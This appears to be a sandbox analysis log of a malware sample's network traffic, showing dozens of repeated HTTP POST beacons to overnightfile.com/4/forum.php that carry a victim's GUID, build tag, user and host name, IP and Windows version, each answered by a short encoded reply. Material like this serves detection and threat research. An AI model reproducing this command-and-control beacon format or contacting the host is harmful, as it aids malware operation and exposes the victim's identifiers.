                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:43.232639074 CEST856INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:42 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVCXEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:43.539115906 CEST857OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:43.629667044 CEST857INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:43 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYNMBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:43.952353954 CEST857OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:44.042032957 CEST858INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:43 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 41 5a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFAZUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:44.414557934 CEST858OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:44.503479004 CEST858INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:44 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJHSQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:44.808948994 CEST859OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:44.900147915 CEST859INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:44 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTAZGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:45.204744101 CEST860OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:45.298270941 CEST860INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:44 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZKPAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:45.611336946 CEST860OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:45.706754923 CEST861INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:45 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 47 54 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGGTTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:46.025877953 CEST861OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:46.118980885 CEST861INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:45 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJYBQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:46.437747955 CEST862OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:46.533116102 CEST862INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:46 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFMNUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:46.842355967 CEST863OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:46.936834097 CEST863INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:46 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMVENARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:47.263849974 CEST864OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:47.359527111 CEST864INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:46 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMZANARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:47.680401087 CEST865OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:47.771220922 CEST865INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHFUSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:48.258481026 CEST865OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:48.349756002 CEST865INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:48.639834881 CEST866OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:48.733324051 CEST866INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVFUEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.039860964 CEST867OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.130265951 CEST867INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYZABARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.479088068 CEST868OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.576457977 CEST868INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:49.892574072 CEST868OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:49.981486082 CEST869INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQBYJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:50.273179054 CEST869OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
